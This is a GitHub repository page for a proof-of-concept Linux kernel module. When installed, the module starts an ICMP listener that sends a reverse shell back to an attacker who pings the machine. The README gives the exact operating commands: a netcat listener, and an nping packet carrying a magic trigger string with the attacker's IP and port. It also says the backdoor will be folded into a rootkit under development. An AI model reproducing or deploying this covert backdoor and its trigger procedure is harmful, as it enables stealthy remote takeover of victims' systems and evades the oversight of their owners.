This is a kernel module invoked reverse shell proof of concept.
C Shell
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
scripts
shells
LICENSE
Makefile
README.md
template.c

README.md

Kernel module invoked reverse shell

When this kernel module is installed it invokes an icmp listener script, this script sends a reverse shell in response to an attacker ping.

Using nc -l [PORT] and then in a separate window running nping --icmp -c 1 -dest-ip [victim ip] --data-string 'maK_it_$H3LL [attacker ip] [PORT]' we can ping the victim machine and send ourselves back a reverse shell. Make sure to have a netcat listener waiting on the port you specify before pinging.

This demonstrates how a user-land script/app can be invoked from the kernel

This functionality will be added as part of the final rootkit that is being developed as part of this project http://r00tkit.me/